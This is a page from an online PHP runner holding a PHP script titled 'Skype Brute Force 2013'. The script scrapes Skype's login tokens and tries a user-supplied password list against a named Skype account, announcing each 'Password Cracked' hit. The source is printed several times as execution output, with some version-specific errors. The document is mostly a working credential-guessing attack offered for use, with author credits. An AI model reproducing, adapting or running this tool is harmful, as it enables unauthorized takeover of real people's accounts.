3v4l.org

run code in 300+ PHP versions simultaneously
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['duedipicca']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>
Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 7.2.29 - 7.2.33, 7.3.16 - 7.3.31, 7.4.0 - 7.4.32, 8.0.0 - 8.0.12, 8.0.14 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.4, 8.3.6
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['duedipicca']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>
Output for 8.3.5
Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 <form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['duedipicca']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>
Output for 8.0.13
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> Warning: Undefined array key "duedipicca" in /in/NgWaZ on line 19 Warning: Undefined array key "passwords" in /in/NgWaZ on line 20 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/NgWaZ:32 Stack trace: #0 /in/NgWaZ(48): xsecurity('https://login.s...') #1 {main} thrown in /in/NgWaZ on line 32
Process exited with code 255.
Output for 7.0.0 - 7.0.20, 7.1.0 - 7.1.25, 7.2.0 - 7.2.13, 7.3.0 - 7.3.1, 7.4.33
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> Notice: Undefined index: duedipicca in /in/NgWaZ on line 19 Notice: Undefined index: passwords in /in/NgWaZ on line 20 Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/NgWaZ:32 Stack trace: #0 /in/NgWaZ(48): xsecurity('https://login.s...') #1 {main} thrown in /in/NgWaZ on line 32
Process exited with code 255.
Output for 7.3.32 - 7.3.33
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> Fatal error: Uncaught Error: Call to undefined function curl_init() in /in/NgWaZ:32 Stack trace: #0 /in/NgWaZ(48): xsecurity('https://login.s...') #1 {main} thrown in /in/NgWaZ on line 32
Process exited with code 255.
Output for 5.4.0 - 5.4.45, 5.5.0 - 5.5.37, 5.6.0 - 5.6.28
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='duedipicca' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> Notice: Undefined index: duedipicca in /in/NgWaZ on line 19 Notice: Undefined index: passwords in /in/NgWaZ on line 20 Fatal error: Call to undefined function curl_init() in /in/NgWaZ on line 32
Process exited with code 255.

preferences:
305.68 ms | 402 KiB | 363 Q